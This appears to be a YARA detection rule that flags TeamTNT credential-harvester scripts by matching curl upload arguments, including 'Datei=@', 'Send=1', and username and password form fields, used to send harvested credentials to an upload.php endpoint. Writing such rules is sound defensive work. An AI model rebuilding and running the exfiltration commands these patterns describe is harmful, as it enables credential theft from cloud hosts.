meta:
description = "Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common curl arguments including 'Datei' (German word for 'file') and specific 'Send=1' arguments found in German blog post https://administrator.de/tutorial/upload-von-dateien-per-batch-curl-und-php-auf-einen-webserver-ohne-ftp-98399.html which details using curl (with these specific arguments) to upload files to upload.php"
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
md5_04 = "f7df739f865448ac82da01b3b1a97041"
md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_06 = "99f0102d673423c920af1abc22f66d4e"
md5_07 = "99f0102d673423c920af1abc22f66d4e"
md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$curlFileArgGerman = ""Datei=@""
$curlArgSend = " -F "Send=1" "
$curlArgUsername = " -F "username="
$curlArgPassword = " -F "password="
condition:
all of them
Note: Cet article a été rédigé et contribué par le chercheur de Permiso, Abian Morina.